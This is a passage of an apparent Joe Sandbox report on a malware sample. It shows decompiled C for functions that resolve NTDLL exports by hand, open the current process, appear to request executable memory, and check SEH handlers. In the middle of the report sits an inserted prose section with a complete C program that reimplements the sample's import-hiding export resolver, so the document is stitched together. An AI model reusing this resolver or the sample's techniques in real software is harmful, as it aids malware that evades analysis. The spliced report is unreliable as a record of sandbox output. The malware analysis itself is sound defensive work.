    			}
    0x004022ad
    0x004022b6
    0x004022c2
    0x004022c6
    0x004022cc
    0x004022d4
    0x004022d5
    0x004022db
    0x004022de
    0x004022e6
    0x004022e9
    0x004022ec
    0x00402301
    0x00402304
    0x004022ee
    0x004022ee
    0x004022f5
    0x00000000
    0x004022f7
    0x004022fa
    0x004022fa
    0x004022f5
    0x0040230a
    0x0040230c
    0x0040230c
    0x00402318

    APIs
      • Part of subcall function 00401046: HeapAlloc.KERNEL32(00000000,00000000,0040272F,?,?,00000000,?,00000006,00000006,?,00401128,?,?,736C6E70,?,00000000), ref: 00401052
    • memset.NTDLL ref: 004022CC
      • Part of subcall function 0040218D: memset.NTDLL ref: 004021AF
      • Part of subcall function 0040218D: memcpy.NTDLL(00000218,00402C82,00000100,?,00010003,?,?,00000318,00000008), ref: 0040222A
      • Part of subcall function 0040218D: RtlNtStatusToDosError.NTDLL(00000000), ref: 0040227F
      • Part of subcall function 0040218D: GetLastError.KERNEL32(?,00000318,00000008), ref: 0040229D
      • Part of subcall function 0040105B: HeapFree.KERNEL32(00000000,00000000,0040275E), ref: 00401067
      • Part of subcall function 0040203C: memset.NTDLL ref: 00402062
      • Part of subcall function 0040203C: memcpy.NTDLL ref: 0040208A
      • Part of subcall function 0040203C: GetLastError.KERNEL32(00000010,00000218,00402C5D,00000100,?,00000318,00000008), ref: 004020A1
      • Part of subcall function 0040203C: GetLastError.KERNEL32(00000010,?,00000000,?,?,?,?,?,?,?,?,00000010,00000218,00402C5D,00000100), ref: 0040217F
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd
    APIs
    • Sleep.KERNELBASE(000001F4), ref: 012A4F75
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd

    Non-executed Functions

    C-Code - Quality: 74%
    			E00402653() {
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				struct HINSTANCE__* _t3;
    				intOrPtr* _t8;
    				struct HINSTANCE__* _t9;
    				struct HINSTANCE__* _t10;
    				signed int _t11;
    				signed int _t13;
    
    				_t3 = GetModuleHandleA("NTDLL.DLL");
    				 *0x4054c4 = _t3;
    				if(_t3 == 0) {
    					_push(0x7e);
    					goto L9;
    				} else {
    					 *0x4054c8 = GetModuleHandleA("KERNEL32.DLL");
    					_t11 = 0;
    					while(1) {
    						_t10 =  *0x4054c4; // 0x774a0000
    						_push( *(_t11 + 0x40501c) ^  *0x405498);
    						_t13 = 0;
    						_push(0);
    						_push(_t10);
    						_t9 = _t10;
    						_t8 = E004027DB(_t9, _t11, 0, 0);
    						if(_t8 != 0) {
    							_t13 =  *_t8 + _t9;
    						}
    						 *(_t11 + 0x40501c) = _t13;
    						if(_t13 == 0) {
    							break;
    						}
    						_t11 = _t11 + 4;
    						if(_t11 < 0x14) {
    							continue;
    						} else {
    						}
    						goto L10;
    					}
    					_push(0x7f);
    					L9:
    					_pop(0);
    				}
    				L10:
    				return 0;
    			}
    0x00402664
    0x00402668
    0x0040266d
    0x004026bb
    0x00000000
    0x0040266f
    0x00402676
    0x0040267b
    0x0040267d
    0x00402689
    0x0040268f
    0x00402690
    0x00402692
    0x00402693
    0x00402694
    0x00402696
    0x0040269d
    0x004026a1
    0x004026a1
    0x004026a5
    0x004026ab
    0x00000000
    0x00000000
    0x004026ad
    0x004026b3
    0x00000000
    0x00000000
    0x004026b5
    0x00000000
    0x004026b3
    0x004026b7
    0x004026bd
    0x004026bd
    0x004026bd
    0x004026c0
    0x004026c4

    APIs
    • GetModuleHandleA.KERNEL32(NTDLL.DLL,773DA47B,0000000C,?,?,004010FB,?,00000000), ref: 00402664
    • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,004010FB,?,00000000), ref: 00402674
      • Part of subcall function 004027DB: lstrcmp.KERNEL32(?,?,00404108,0000002C,0040269B,774A0000,00000000,774E55E0,?,?,004010FB,?,00000000), ref: 004028A9
      • Part of subcall function 004027DB: lstrlenA.KERNEL32(?,00404108,0000002C,0040269B,774A0000,00000000,774E55E0,?,?,004010FB,?,00000000), ref: 004028B4
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd
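E004027DB above, and its caller E00402653, which fills the five slots at 0x40501c with NTDLL addresses, resolve exports by walking the export directory by hand rather than calling GetProcAddress, so the five functions never appear in the sample's import table. The program below is an added example in C, not code from the sample or from Joe Sandbox: it performs the same lookup over a constructed in-memory PE image, picks the data-directory offset from FileHeader.Machine the way E004027DB does (0x14c means a PE32 optional header, so NT+0x78; anything else NT+0x88), and accepts either a pointer to an ANSI name or a small integer ordinal in one parameter, using the same 0 / above-0xffff test. The hash comparison the sample performs in E004029F9 when no name pointer is given is not reproduced, because that routine is not in this report; the export names, RVAs and ordinal base in the fake image are invented for the test.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed test image (not from the sample): 4 KiB, RVA == offset. */
#define IMG_SIZE     0x1000
#define ORDINAL_BASE 5
#define NFUNCS       3
uint8_t g_img[IMG_SIZE];

static void put16(uint32_t off, uint16_t v) { memcpy(g_img + off, &v, 2); }
static void put32(uint32_t off, uint32_t v) { memcpy(g_img + off, &v, 4); }
static uint16_t get16(const uint8_t *p) { uint16_t v; memcpy(&v, p, 2); return v; }
static uint32_t get32(const uint8_t *p) { uint32_t v; memcpy(&v, p, 4); return v; }

/* AddressOfFunctions in index order, and the sorted name table mapping onto it. */
static const uint32_t k_func_rva[NFUNCS] = { 0x640, 0x600, 0x620 };
static const char *const k_name[NFUNCS] = { "NtAllocateVirtualMemory",
                                            "NtProtectVirtualMemory",
                                            "RtlNtStatusToDosError" };
static const uint16_t k_name_idx[NFUNCS] = { 1, 2, 0 };

/* Lay out 'MZ', 'PE', the export DataDirectory entry and an export directory at RVA 0x300. */
void build_fake_image(int pe32plus)
{
    const uint32_t nt = 0x80, exp = 0x300;
    uint32_t str = 0x500;
    memset(g_img, 0, IMG_SIZE);
    put16(0x00, 0x5a4d);                          /* e_magic */
    put32(0x3c, nt);                              /* e_lfanew */
    put32(nt, 0x4550);                            /* 'PE\0\0' */
    put16(nt + 4, pe32plus ? 0x8664 : 0x14c);     /* FileHeader.Machine */
    /* DataDirectory[EXPORT] is at NT+0x78 for PE32 and NT+0x88 for PE32+ */
    put32(nt + (pe32plus ? 0x88 : 0x78), exp);
    put32(nt + (pe32plus ? 0x8c : 0x7c), 0x300);  /* directory size: 0x300..0x600 */
    put32(exp + 0x10, ORDINAL_BASE);              /* Base */
    put32(exp + 0x14, NFUNCS);                    /* NumberOfFunctions */
    put32(exp + 0x18, NFUNCS);                    /* NumberOfNames */
    put32(exp + 0x1c, 0x400);                     /* AddressOfFunctions */
    put32(exp + 0x20, 0x420);                     /* AddressOfNames */
    put32(exp + 0x24, 0x440);                     /* AddressOfNameOrdinals */
    for (uint32_t i = 0; i < NFUNCS; i++) {
        put32(0x400 + 4 * i, k_func_rva[i]);
        put32(0x420 + 4 * i, str);
        put16(0x440 + 2 * i, k_name_idx[i]);
        strcpy((char *)g_img + str, k_name[i]);
        str += (uint32_t)strlen(k_name[i]) + 1;
    }
}

/* Resolve an export as E004027DB does: 0 or a value above 0xffff is a pointer to an ANSI
 * name, anything else an ordinal.  Returns the RVA, or 0 if absent or forwarded. */
uint32_t find_export(const uint8_t *base, uintptr_t name_or_ordinal)
{
    if (get16(base) != 0x5a4d) return 0;
    const uint8_t *nt = base + get32(base + 0x3c);
    if (get32(nt) != 0x4550) return 0;
    /* Machine 0x14c (i386) means a PE32 optional header, so the directory is at NT+0x78 */
    const uint8_t *dir = nt + (get16(nt + 4) == 0x14c ? 0x78 : 0x88);
    uint32_t exp_rva = get32(dir), exp_size = get32(dir + 4);
    if (exp_rva == 0 || exp_size == 0) return 0;
    const uint8_t *exp = base + exp_rva;
    uint32_t ord_base = get32(exp + 0x10);
    uint32_t nfuncs = get32(exp + 0x14), nnames = get32(exp + 0x18);
    const uint8_t *funcs = base + get32(exp + 0x1c);
    const uint8_t *names = base + get32(exp + 0x20);
    const uint8_t *ords  = base + get32(exp + 0x24);
    uint32_t idx;
    if (name_or_ordinal != 0 && name_or_ordinal <= 0xffff) {
        if (name_or_ordinal < ord_base) return 0;
        idx = (uint32_t)name_or_ordinal - ord_base;   /* biased ordinal -> table index */
    } else {
        const char *want = (const char *)name_or_ordinal;
        uint32_t i;
        if (want == NULL) return 0;   /* the sample's hash path (E004029F9) is not shown */
        for (i = 0; i < nnames; i++) {
            const char *cand = (const char *)base + get32(names + 4 * i);
            /* first-byte filter before the full compare, as in the sample */
            if (cand[0] == want[0] && strcmp(cand, want) == 0) break;
        }
        if (i == nnames) return 0;
        idx = get16(ords + 2 * i);                   /* name ordinals are unbiased */
    }
    if (idx >= nfuncs) return 0;
    uint32_t rva = get32(funcs + 4 * idx);
    /* an RVA inside the export directory is a forwarder string, not code */
    if (rva >= exp_rva && rva < exp_rva + exp_size) return 0;
    return rva;
}

int main(void)
{
    build_fake_image(0);
    printf("PE32  by name:    %#x\n", find_export(g_img, (uintptr_t)"NtAllocateVirtualMemory"));
    printf("PE32  by ordinal: %#x\n", find_export(g_img, ORDINAL_BASE + 2));
    build_fake_image(1);
    printf("PE32+ by name:    %#x\n", find_export(g_img, (uintptr_t)"RtlNtStatusToDosError"));
    return 0;
}
```

On a live target `base` is the module handle E00402653 obtains with GetModuleHandleA for NTDLL.DLL and KERNEL32.DLL, and the caller adds the returned RVA to it, which is what `*_t8 + _t9` does before the result is stored back into the 0x40501c slot. The sample's E004027DB returns a pointer to the address-table entry rather than the RVA itself and performs no forwarder check; both differences are deliberate here. The resolved slots are later invoked through function pointers, for example in E00402603, whose six-argument call ending in 0x3000 and 0x40 is consistent with NtAllocateVirtualMemory requesting MEM_COMMIT|MEM_RESERVE and PAGE_EXECUTE_READWRITE; that identification is an inference from the argument shape, as the report does not name the function.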
    C-Code - Quality: 100%
    			E00401AA8() {
    				void* _t1;
    				long _t3;
    				void* _t4;
    				long _t5;
    				void* _t6;
    				intOrPtr _t8;
    				void* _t12;
    
    				_t8 =  *0x405484; // 0x400000
    				_t1 = CreateEventA(0, 1, 0, 0);
    				 *0x405490 = _t1;
    				if(_t1 == 0) {
    					return GetLastError();
    				}
    				_t3 = GetVersion();
    				if(_t3 != 5) {
    					L4:
    					if(_t12 <= 0) {
    						_t4 = 0x32;
    						return _t4;
    					} else {
    						goto L5;
    					}
    				} else {
    					if(_t3 > 0) {
    						L5:
    						 *0x40547c = _t3;
    						_t5 = GetCurrentProcessId();
    						 *0x405478 = _t5;
    						 *0x405484 = _t8;
    						_t6 = OpenProcess(0x10047a, 0, _t5);
    						 *0x405474 = _t6;
    						if(_t6 == 0) {
    							 *0x405474 =  *0x405474 | 0xffffffff;
    						}
    						return 0;
    					} else {
    						_t12 = _t3 - _t3;
    						goto L4;
    					}
    				}
    			}
    0x00401aa9
    0x00401ab7
    0x00401abf
    0x00401ac4
    0x00401b16
    0x00401b16
    0x00401ac6
    0x00401ace
    0x00401ad6
    0x00401ad6
    0x00401b12
    0x00401b14
    0x00000000
    0x00000000
    0x00000000
    0x00401ad0
    0x00401ad2
    0x00401ad8
    0x00401ad8
    0x00401add
    0x00401aeb
    0x00401af0
    0x00401af6
    0x00401afe
    0x00401b03
    0x00401b05
    0x00401b05
    0x00401b0f
    0x00401ad4
    0x00401ad4
    0x00000000
    0x00401ad4
    0x00401ad2

    APIs
    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00401086,?,00000000), ref: 00401AB7
    • GetVersion.KERNEL32(?,00000000), ref: 00401AC6
    • GetCurrentProcessId.KERNEL32(?,00000000), ref: 00401ADD
    • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000000), ref: 00401AF6
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd
    C-Code - Quality: 58%
    			E004025C0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {
    				intOrPtr* _t5;
    				long _t6;
    				void* _t9;
    
    				_t5 =  *0x405028;
    				_t9 = 0;
    				if(_t5 == 0) {
    					_t6 = 0xc0000002;
    					goto L4;
    				} else {
    					_t1 =  &_a16; // 0x402260
    					_t6 =  *_t5(_a4, _a8, _a12, 0x318,  *_t1);
    					if(_t6 < 0) {
    						L4:
    						SetLastError(RtlNtStatusToDosError(_t6));
    					} else {
    						_t9 = 1;
    					}
    				}
    				return _t9;
    			}
    0x004025c0
    0x004025c6
    0x004025ca
    0x004025ea
    0x00000000
    0x004025cc
    0x004025cc
    0x004025e1
    0x004025e5
    0x004025ef
    0x004025f7
    0x004025e7
    0x004025e7
    0x004025e7
    0x004025e5
    0x00402600

    APIs
    • RtlNtStatusToDosError.NTDLL(C0000002), ref: 004025F0
    • SetLastError.KERNEL32(00000000,?,00000318,00000008), ref: 004025F7
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd
    C-Code - Quality: 58%
    			E00402603(void* __ecx, intOrPtr _a4) {
    				signed int _v8;
    				char _v12;
    				intOrPtr* _t12;
    				long _t14;
    
    				_t12 =  *0x40502c;
    				_v8 = _v8 & 0x00000000;
    				if(_t12 != 0) {
    					_v8 = _v8 & 0x00000000;
    					_v12 = 0x318;
    					_t14 =  *_t12(_a4,  &_v8, 0,  &_v12, 0x3000, 0x40);
    					if(_t14 < 0) {
    						SetLastError(RtlNtStatusToDosError(_t14));
    						_v8 = _v8 & 0x00000000;
    					}
    				}
    				return _v8;
    			}
    0x00402608
    0x0040260d
    0x00402613
    0x00402615
    0x0040262d
    0x00402634
    0x00402638
    0x00402642
    0x00402648
    0x00402648
    0x00402638
    0x00402650

    APIs
    • RtlNtStatusToDosError.NTDLL(00000000), ref: 0040263B
    • SetLastError.KERNEL32(00000000), ref: 00402642
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd
    C-Code - Quality: 100%
    			E00402F99(long _a4) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				signed int _v16;
    				short* _v32;
    				void _v36;
    				void* _t57;
    				signed int _t58;
    				signed int _t61;
    				signed int _t62;
    				void* _t63;
    				signed int* _t68;
    				intOrPtr* _t69;
    				intOrPtr* _t71;
    				intOrPtr _t72;
    				intOrPtr _t75;
    				void* _t76;
    				signed int _t77;
    				void* _t78;
    				void _t80;
    				signed int _t81;
    				signed int _t84;
    				signed int _t86;
    				short* _t87;
    				void* _t89;
    				signed int* _t90;
    				long _t91;
    				signed int _t93;
    				signed int _t94;
    				signed int _t100;
    				signed int _t102;
    				void* _t104;
    				long _t108;
    				signed int _t110;
    
    				_t108 = _a4;
    				_t76 =  *(_t108 + 8);
    				if((_t76 & 0x00000003) != 0) {
    					L3:
    					return 0;
    				}
    				_a4 =  *[fs:0x4];
    				_v8 =  *[fs:0x8];
    				if(_t76 < _v8 || _t76 >= _a4) {
    					_t102 =  *(_t108 + 0xc);
    					__eflags = _t102 - 0xffffffff;
    					if(_t102 != 0xffffffff) {
    						_t91 = 0;
    						__eflags = 0;
    						_a4 = 0;
    						_t57 = _t76;
    						do {
    							_t80 =  *_t57;
    							__eflags = _t80 - 0xffffffff;
    							if(_t80 == 0xffffffff) {
    								goto L9;
    							}
    							__eflags = _t80 - _t91;
    							if(_t80 >= _t91) {
    								L20:
    								_t63 = 0;
    								L60:
    								return _t63;
    							}
    							L9:
    							__eflags =  *(_t57 + 4);
    							if( *(_t57 + 4) != 0) {
    								_t12 =  &_a4;
    								 *_t12 = _a4 + 1;
    								__eflags =  *_t12;
    							}
    							_t91 = _t91 + 1;
    							_t57 = _t57 + 0xc;
    							__eflags = _t91 - _t102;
    						} while (_t91 <= _t102);
    						__eflags = _a4;
    						if(_a4 == 0) {
    							L15:
    							_t81 =  *0x4054d0; // 0x0
    							_t110 = _t76 & 0xfffff000;
    							_t58 = 0;
    							__eflags = _t81;
    							if(_t81 <= 0) {
    								L18:
    								_t104 = _t102 | 0xffffffff;
    								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
    								__eflags = _t61;
    								if(_t61 < 0) {
    									_t62 = 0;
    									__eflags = 0;
    								} else {
    									_t62 = _a4;
    								}
    								__eflags = _t62;
    								if(_t62 == 0) {
    									L59:
    									_t63 = _t104;
    									goto L60;
    								} else {
    									__eflags = _v12 - 0x1000000;
    									if(_v12 != 0x1000000) {
    										goto L59;
    									}
    									__eflags = _v16 & 0x000000cc;
    									if((_v16 & 0x000000cc) == 0) {
    										L46:
    										_t63 = 1;
    										 *0x405518 = 1;
    										__eflags =  *0x405518;
    										if( *0x405518 != 0) {
    											goto L60;
    										}
    										_t84 =  *0x4054d0; // 0x0
    										__eflags = _t84;
    										_t93 = _t84;
    										if(_t84 <= 0) {
    											L51:
    											__eflags = _t93;
    											if(_t93 != 0) {
    												L58:
    												 *0x405518 = 0;
    												goto L5;
    											}
    											_t77 = 0xf;
    											__eflags = _t84 - _t77;
    											if(_t84 <= _t77) {
    												_t77 = _t84;
    											}
    											_t94 = 0;
    											__eflags = _t77;
    											if(_t77 < 0) {
    												L56:
    												__eflags = _t84 - 0x10;
    												if(_t84 < 0x10) {
    													_t86 = _t84 + 1;
    													__eflags = _t86;
    													 *0x4054d0 = _t86;
    												}
    												goto L58;
    											} else {
    												do {
    													_t68 = 0x4054d8 + _t94 * 4;
    													_t94 = _t94 + 1;
    													__eflags = _t94 - _t77;
    													 *_t68 = _t110;
    													_t110 =  *_t68;
    												} while (_t94 <= _t77);
    												goto L56;
    											}
    										}
    										_t69 = 0x4054d4 + _t84 * 4;
    										while(1) {
    											__eflags =  *_t69 - _t110;
    											if( *_t69 == _t110) {
    												goto L51;
    											}
    											_t93 = _t93 - 1;
    											_t69 = _t69 - 4;
    											__eflags = _t93;
    											if(_t93 > 0) {
    												continue;
    											}
    											goto L51;
    										}
    										goto L51;
    									}
    									_t87 = _v32;
    									__eflags =  *_t87 - 0x5a4d;
    									if( *_t87 != 0x5a4d) {
    										goto L59;
    									}
    									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
    									__eflags =  *_t71 - 0x4550;
    									if( *_t71 != 0x4550) {
    										goto L59;
    									}
    									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
    									if( *((short*)(_t71 + 0x18)) != 0x10b) {
    										goto L59;
    									}
    									_t78 = _t76 - _t87;
    									__eflags =  *((short*)(_t71 + 6));
    									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
    									if( *((short*)(_t71 + 6)) <= 0) {
    										goto L59;
    									}
    									_t72 =  *((intOrPtr*)(_t89 + 0xc));
    									__eflags = _t78 - _t72;
    									if(_t78 < _t72) {
    										goto L46;
    									}
    									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
    									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
    										goto L46;
    									}
    									__eflags =  *(_t89 + 0x27) & 0x00000080;
    									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
    										goto L20;
    									}
    									goto L46;
    								}
    							} else {
    								goto L16;
    							}
    							while(1) {
    								L16:
    								__eflags =  *((intOrPtr*)(0x4054d8 + _t58 * 4)) - _t110;
    								if( *((intOrPtr*)(0x4054d8 + _t58 * 4)) == _t110) {
    									break;
    								}
    								_t58 = _t58 + 1;
    								__eflags = _t58 - _t81;
    								if(_t58 < _t81) {
    									continue;
    								}
    								goto L18;
    							}
    							__eflags = _t58;
    							if(_t58 <= 0) {
    								goto L5;
    							}
    							 *0x405518 = 1;
    							__eflags =  *0x405518;
    							if( *0x405518 != 0) {
    								goto L5;
    							}
    							__eflags =  *((intOrPtr*)(0x4054d8 + _t58 * 4)) - _t110;
    							if( *((intOrPtr*)(0x4054d8 + _t58 * 4)) == _t110) {
    								L32:
    								_t100 = 0;
    								__eflags = _t58;
    								if(_t58 < 0) {
    									L34:
    									 *0x405518 = 0;
    									goto L5;
    								} else {
    									goto L33;
    								}
    								do {
    									L33:
    									_t90 = 0x4054d8 + _t100 * 4;
    									_t100 = _t100 + 1;
    									__eflags = _t100 - _t58;
    									 *_t90 = _t110;
    									_t110 =  *_t90;
    								} while (_t100 <= _t58);
    								goto L34;
    							}
    							_t25 = _t81 - 1; // -1
    							_t58 = _t25;
    							__eflags = _t58;
    							if(_t58 < 0) {
    								L28:
    								__eflags = _t81 - 0x10;
    								if(_t81 < 0x10) {
    									_t81 = _t81 + 1;
    									__eflags = _t81;
    									 *0x4054d0 = _t81;
    								}
    								_t28 = _t81 - 1; // 0x0
    								_t58 = _t28;
    								goto L32;
    							} else {
    								goto L25;
    							}
    							while(1) {
    								L25:
    								__eflags =  *((intOrPtr*)(0x4054d8 + _t58 * 4)) - _t110;
    								if( *((intOrPtr*)(0x4054d8 + _t58 * 4)) == _t110) {
    									break;
    								}
    								_t58 = _t58 - 1;
    								__eflags = _t58;
    								if(_t58 >= 0) {
    									continue;
    								}
    								break;
    							}
    							__eflags = _t58;
    							if(__eflags >= 0) {
    								if(__eflags == 0) {
    									goto L34;
    								}
    								goto L32;
    							}
    							goto L28;
    						}
    						_t75 =  *((intOrPtr*)(_t108 - 8));
    						__eflags = _t75 - _v8;
    						if(_t75 < _v8) {
    							goto L20;
    						}
    						__eflags = _t75 - _t108;
    						if(_t75 >= _t108) {
    							goto L20;
    						}
    						goto L15;
    					}
    					L5:
    					_t63 = 1;
    					goto L60;
    				} else {
    					goto L3;
    				}
    			}
    0x00402fa3
    0x00402fa6
    0x00402fac
    0x00402fca
    0x00000000
    0x00402fca
    0x00402fb4
    0x00402fbd
    0x00402fc3
    0x00402fd2
    0x00402fd5
    0x00402fd8
    0x00402fe2
    0x00402fe2
    0x00402fe4
    0x00402fe7
    0x00402fe9
    0x00402fe9
    0x00402feb
    0x00402fee
    0x00000000
    0x00000000
    0x00402ff0
    0x00402ff2
    0x00403058
    0x00403058
    0x004031b6
    0x00000000
    0x004031b6
    0x00402ff4
    0x00402ff4
    0x00402ff8
    0x00402ffa
    0x00402ffa
    0x00402ffa
    0x00402ffa
    0x00402ffd
    0x00402ffe
    0x00403001
    0x00403001
    0x00403005
    0x00403009
    0x00403017
    0x00403017
    0x0040301f
    0x00403025
    0x00403027
    0x00403029
    0x00403039
    0x00403046
    0x0040304a
    0x0040304f
    0x00403051
    0x004030cf
    0x004030cf
    0x00403053
    0x00403053
    0x00403053
    0x004030d1
    0x004030d3
    0x004031b4
    0x004031b4
    0x00000000
    0x004030d9
    0x004030d9
    0x004030e0
    0x00000000
    0x00000000
    0x004030e6
    0x004030ea
    0x00403146
    0x00403148
    0x00403150
    0x00403152
    0x00403154
    0x00000000
    0x00000000
    0x00403156
    0x0040315c
    0x0040315e
    0x00403160
    0x00403175
    0x00403175
    0x00403177
    0x004031a6
    0x004031ad
    0x00000000
    0x004031ad
    0x0040317b
    0x0040317c
    0x0040317e
    0x00403180
    0x00403180
    0x00403182
    0x00403184
    0x00403186
    0x0040319a
    0x0040319a
    0x0040319d
    0x0040319f
    0x0040319f
    0x004031a0
    0x004031a0
    0x00000000
    0x00403188
    0x00403188
    0x00403188
    0x00403191
    0x00403192
    0x00403194
    0x00403196
    0x00403196
    0x00000000
    0x00403188
    0x00403186
    0x00403162
    0x00403169
    0x00403169
    0x0040316b
    0x00000000
    0x00000000
    0x0040316d
    0x0040316e
    0x00403171
    0x00403173
    0x00000000
    0x00000000
    0x00000000
    0x00403173
    0x00000000
    0x00403169
    0x004030ec
    0x004030ef
    0x004030f4
    0x00000000
    0x00000000
    0x004030fd
    0x004030ff
    0x00403105
    0x00000000
    0x00000000
    0x0040310b
    0x00403111
    0x00000000
    0x00000000
    0x00403117
    0x00403119
    0x00403122
    0x00403126
    0x00000000
    0x00000000
    0x0040312c
    0x0040312f
    0x00403131
    0x00000000
    0x00000000
    0x00403138
    0x0040313a
    0x00000000
    0x00000000
    0x0040313c
    0x00403140
    0x00000000
    0x00000000
    0x00000000
    0x00403140
    0x00000000
    0x00000000
    0x00000000
    0x0040302b
    0x0040302b
    0x0040302b
    0x00403032
    0x00000000
    0x00000000
    0x00403034
    0x00403035
    0x00403037
    0x00000000
    0x00000000
    0x00000000
    0x00403037
    0x0040305f
    0x00403061
    0x00000000
    0x00000000
    0x00403071
    0x00403073
    0x00403075
    0x00000000
    0x00000000
    0x0040307b
    0x00403082
    0x004030ae
    0x004030ae
    0x004030b0
    0x004030b2
    0x004030c6
    0x004030c8
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004030b4
    0x004030b4
    0x004030b4
    0x004030bd
    0x004030be
    0x004030c0
    0x004030c2
    0x004030c2
    0x00000000
    0x004030b4
    0x00403084
    0x00403084
    0x00403087
    0x00403089
    0x0040309b
    0x0040309b
    0x0040309e
    0x004030a0
    0x004030a0
    0x004030a1
    0x004030a1
    0x004030a7
    0x004030a7
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040308b
    0x0040308b
    0x0040308b
    0x00403092
    0x00000000
    0x00000000
    0x00403094
    0x00403094
    0x00403095
    0x00000000
    0x00000000
    0x00000000
    0x00403095
    0x00403097
    0x00403099
    0x004030ac
    0x00000000
    0x00000000
    0x00000000
    0x004030ac
    0x00000000
    0x00403099
    0x0040300b
    0x0040300e
    0x00403011
    0x00000000
    0x00000000
    0x00403013
    0x00403015
    0x00000000
    0x00000000
    0x00000000
    0x00403015
    0x00402fda
    0x00402fdc
    0x00000000
    0x00000000
    0x00000000
    0x00000000

    APIs
    • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 0040304A
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd
    C-Code - Quality: 37%
    			E0040259F(intOrPtr _a4, intOrPtr _a8) {
    				void* _t3;
    				intOrPtr* _t6;
    
    				_t6 =  *0x40501c;
    				_t3 = 0x7f;
    				if(_t6 != 0) {
    					return RtlNtStatusToDosError( *_t6(_a4, _a8));
    				}
    				return _t3;
    			}





    0x0040259f
    0x004025a9
    0x004025aa
    0x00000000
    0x004025b7
    0x004025bd

    APIs
    • RtlNtStatusToDosError.NTDLL(00000000), ref: 004025B7
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd
    C-Code - Quality: 68%
    			E00402D2C(void* __ebx, void* __edi, void* __esi) {
    				intOrPtr _t14;
    				intOrPtr _t18;
    				void* _t19;
    				void* _t20;
    
    				_push(E00402D80);
    				_push( *[fs:0x0]);
    				 *((intOrPtr*)(_t20 + 0x10)) = _t18;
    				_t19 = _t20 + 0x10;
    				 *((intOrPtr*)(_t19 - 0x18)) = _t20 -  *((intOrPtr*)(_t20 + 0x10));
    				_push( *((intOrPtr*)(_t19 - 8)));
    				 *((intOrPtr*)(_t19 - 4)) = 0xffffffff;
    				 *((intOrPtr*)(_t19 - 8)) =  *((intOrPtr*)(_t19 - 4));
